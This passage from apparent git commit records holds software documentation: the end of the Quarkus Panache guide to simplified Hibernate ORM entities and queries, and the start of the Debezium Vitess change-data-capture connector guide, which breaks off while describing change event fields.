Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nint count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream()\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows your to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] [order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: You can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL]:\n\n[source,java]\n--\nOrder.find(\"select distinct o from Order o left join fetch o.lineItems\");\n--\n\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nMake sure to wrap methods modifying your database (e.g. `entity.persist()`) within a transaction. Marking a \nCDI bean method `@Transactional` will do that for you and make that method a transaction boundary. We recommend doing \nso at your application entry point boundaries like your REST endpoint controllers.\n\n== Lock management\n\nPanache does not provide direct support for database locking, but you can do it by injecting the `EntityManager` in your entity (or `PanacheRepository`) and creating a specific method that will use the entity manager to lock the entity after retrieval. The entity manager can also be retrieved via `Panache.getEntityManager()`.\n\nThe following example contains a `findByIdForUpdate` method that finds the entity by primary key then locks it. The lock will generate a `SELECT ... FOR UPDATE` query (the same principle can be used for other kinds of `find*` methods):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n\n \/\/ inject the EntityManager inside the entity\n @Inject\n EntityManager entityManager;\n \n public static Person findByIfForUpdate(Long id){\n Person person = findById(id);\n \/\/lock with the PESSIMISTIC_WRITE mode type : this will generate a SELECT ... FOR UPDATE query\n entityManager.lock(person, LockModeType.PESSIMISTIC_WRITE);\n return person;\n }\n}\n--\n\nThis will generate two select queries: one to retrieve the entity and the second to lock it. Be careful that locks are released when the transaction ends, so the method that invokes the lock query must be annotated with the `@Transactional` annotation.\n\nWe are currently evaluating adding support for lock management inside Panache. If you are interested, please visit our github issue link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/2744[#2744] and contribute to the discussion.\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting them handled by the framework, once again we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly deal with, such as:\n\n- Duplicating ID logic: most entities need an ID, most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise to split entity definition (the model) from the operations you can do on them\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in the Object Oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getter and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. \n\n== Defining entities in external projects or jars\n\nHibernate ORM in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you can make sure that your jar is treated like a Quarkus application library by adding an empty `META-INF\/beans.xml` file.\nThis will allow Quarkus to index and enhance your entities as if they were inside the current project.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1425c9208d6afd3d2af12015a8ca0631ce8819f8","subject":"DBZ-4886 update documentation","message":"DBZ-4886 update documentation\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/vitess.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/vitess.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-vitess\"]\n= {prodname} connector for Vitess\n:context: vitess\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Vitess connector captures row-level changes in the shards of a Vitess link:https:\/\/vitess.io\/docs\/concepts\/keyspace\/[keyspace].\nFor information about the Vitess versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\n\nThe connector does not support snapshot feature at the moment. The first time it connects to a Vitess cluster, it starts from the current VGTID location of the keyspace and continuously captures row-level changes that insert, update, and delete database content and that were committed to a Vitess keyspace. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Vitess connector\n\/\/ ModuleID: overview-of-debezium-vitess-connector\n[[vitess-overview]]\n== Overview\n\nVitess's link:https:\/\/vitess.io\/docs\/concepts\/vstream\/[VStream] feature was introduced in version 4.0. It is a change event subscription service that provides equivalent information to the MySQL binary logs from the underlying MySQL shards of the Vitess cluster. An user can subscribe to multiple shards in a keyspace, making it a convenient tool to feed downstream CDC processes.\n\nTo read and process database changes, the Vitess connector subscribes to link:https:\/\/vitess.io\/docs\/concepts\/vtgate\/[VTGate]'s VStream gRPC service. VTGate is a lightweight, stateless gRPC server, which is part of the Vitess cluster setup.\n\nThe connector gives you the flexibility to choose to subscribe to the `MASTER` nodes, or to the `REPLICA` nodes for change events.\n\nThe connector produces a change event for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the VGTID position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-work\n\/\/ Title: How {prodname} Vitess connectors work\n[[how-the-vitess-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Vitess connector, it is helpful to understand how the connector streams change events, determines Kafka topic names, and uses metadata.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-vitess-connectors-stream-change-event-records\n\/\/ Title: How {prodname} Vitess connectors stream change event records\n[[vitess-streaming-changes]]\n=== Streaming changes\n\nThe Vitess connector spends all its time streaming changes from the VTGate's VStream gRPC service to which it is subscribed. The client receives changes from VStream as they are committed in the underlying MySQL server's binlog at certain positions, which are referred to as VGTID.\n\nThe VGTID in Vitess is the equivalent of GTID in MySQL, it describes the position in the VStream in which a change event happens. Typically, A VGTID has multiple shard GTIDs, each shard GTID is a tuple of `(Keyspace, Shard, GTID)`, which describes the GTID position of a given shard.\n\nWhen subscribing to a VStream service, the connector needs to provide a VGTID and a link:https:\/\/vitess.io\/docs\/concepts\/tablet\/#tablet-types[Tablet Type] (e.g. `MASTER`, `REPLICA`). The VGTID describes the position from which VStream should starts sending change events; the Tablet type describes which underlying MySQL instance (master or replica) in each shard do we read change events from.\n\nThe first time the connector connects to a Vitess cluster, it gets the current VGTID from a Vitess component called link:https:\/\/vitess.io\/docs\/concepts\/vtctld\/[VTCtld] and provides the current VGTID to VStream.\n\nThe {prodname} Vitess connector acts as a gRPC client of VStream. When the connector receives changes it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the VGTID of the event. The Vitess connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the Vitess connector, the VGTID recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to VStream to send the events starting just after that position.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-vitess-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Vitess change event records\n[[vitess-topic-names]]\n=== Topics names\n\nThe Vitess connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._keyspaceName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _keyspaceName_ is the name of the keyspace (a.k.a. database) where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a Vitess installation that has an `commerce` keyspace that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. Regardless of how many shards the keyspace has, the connector would stream records to these four Kafka topics:\n\n* `fulfillment.commerce.products`\n* `fulfillment.commerce.products_on_hand`\n* `fulfillment.commerce.customers`\n* `fulfillment.commerce.orders`\n\n[[vitess-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements.\nthat indicates the number of events that the connector emits for changes that originate from a data collection.\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-37\\\"}]\",\n \"event_count\": 1,\n \"data_collections\": [\n {\n \"data_collection\": \"test_unsharded_keyspace.my_seq\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:vitess-property-transaction-topic[`transaction.topic`] option,\nthe connector emits transaction events to the xref:vitess-property-database-server-name[`_<database.server.name>_`]`.transaction` topic.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": 1637988245467,\n \"transaction\": {\n \"id\": \"[{\\\"keyspace\\\":\\\"test_unsharded_keyspace\\\",\\\"shard\\\":\\\"0\\\",\\\"gtid\\\":\\\"MySQL56\/e03ece6c-4c04-11ec-8e20-0242ac110004:1-68\\\"}]\",\n \"total_order\": 1,\n \"data_collection_order\": 1\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Vitess connector data change events\n[[vitess-events]]\n== Data change events\n\nThe {prodname} Vitess connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the first single-column unique key if the table does not have a primary key, for the table that was changed. Multi-column unique key is not supported. +\n +\nIt is possible to override the table's primary key by setting the xref:vitess-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nBy default behavior is that the connector streams change event records to xref:vitess-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe Vitess connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n[IMPORTANT]\n====\nThe connector doesn't allow to name columns with the `@` prefix at the moment. For example, `age` is a valid column name, and `@age` is not. The reason is that Vitess vstreamer has a bug that would send events with anonymized column names (e.g. column name `age` is anonymized to `@1`). There's no easy way to differentiate between a legit column name with the `@` prefix, and the Vitess bug. See more discussion link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[here].\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-vitess-change-events\n\/\/ Title: About keys in {prodname} Vitess change events\n[[vitess-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created.\n\nConsider a `customers` table defined in the `commerce` keyspace and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `Vitess_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"Vitess_server.commerce.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`Vitess_server.commerce.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._keyspace-name_._table-name_.`Key`. In this example: +\n\n* `Vitess_server` is the name of the connector that generated this event. +\n* `commerce` is the keyspace that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary, then the change event's key is null. The rows in a table without a primary key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-vitess-change-events\n\/\/ Title: About values in {prodname} Vitess change events\n[[vitess-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INT NOT NULL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n\n\/\/ Type: continue\n[[vitess-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"Vitess_server.commerce.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"vgtid\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.vitess.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"Vitess_server.commerce.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-45\\\"}]\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`Vitess_server.commerce.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._keyspaceName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the xref:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.vitess.Source` is the schema for the payload's `source` field. This schema is specific to the Vitess connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`Vitess_server.commerce.customers.Envelope` is the schema for the overall structure of the payload, where `Vitess_server` is the connector name, `commerce` is the keyspace, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the 